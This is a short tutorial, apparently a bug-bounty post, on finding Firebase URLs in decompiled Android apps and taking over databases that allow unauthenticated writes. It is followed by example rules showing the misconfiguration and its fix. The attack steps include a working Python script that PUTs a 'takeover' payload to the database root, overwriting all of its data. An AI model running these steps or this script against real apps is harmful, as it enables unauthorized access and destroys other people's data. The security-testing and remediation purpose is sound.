Misconfigured Firebase DB Takeover
Firebase is a cloud-based NoSQL database that stores and syncs data between users in real time. If developers fail to configure it correctly, the resulting misconfiguration can let an attacker take the database over.
1. Decompile the APK with apktool d example.apk
2. Enter the decompiled folder and search for firebaseio.com with grep -iR firebaseio
3. Assuming you have found the Firebase URL, paste it into a browser and append .json to test whether it is vulnerable.
It looks roughly like this: https://example.firebaseio.com/.json
If you can read the data at this point, the database contents are public. That is a very serious vulnerability, because the whole Firebase Realtime Database is exposed.
If you see nothing but null, it means we can continue trying to exploit it.
If you see "Permission denied", the database is configured correctly and a takeover attack is not possible.
4. Write a script to attempt the takeover:
import requests

# Root of the Realtime Database; appending .json selects the REST API
url = "https://example-db.firebaseio.com/.json"
data = {"Exploit": "Successfull", "DATABASE TAKEOVER BY": "Dhabal"}

try:
    # PUT replaces the data at this path; it only succeeds if the rules allow unauthenticated writes
    response = requests.put(url, json=data, timeout=10)
    if response.status_code == 200:
        print("Database takeover successful.")
    else:
        print(f"Failed: {response.status_code}")
except requests.RequestException as e:
    print(f"Error: {e}")
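An added example, not from the original post: the Realtime Database rules (database.rules.json) that produce the readable and writable responses seen in step 3, with a corrected ruleset beside them. Firebase's rules editor accepts // comments; the users/$uid path is an assumed schema.

```json
{
  "rules": {
    // Misconfigured rules: the whole database is readable and writable
    // without authentication, which is what the /.json check in step 3 finds
    // and what lets the PUT in step 4 succeed:
    //   ".read": true,
    //   ".write": true
    //
    // Corrected rules: deny everything at the root, then grant access only
    // to the signed-in owner of each subtree. An unauthenticated PUT to
    // /.json now returns 401 "Permission denied".
    ".read": false,
    ".write": false,
    "users": {
      "$uid": {
        ".read": "auth != null && auth.uid === $uid",
        ".write": "auth != null && auth.uid === $uid"
      }
    }
  }
}
```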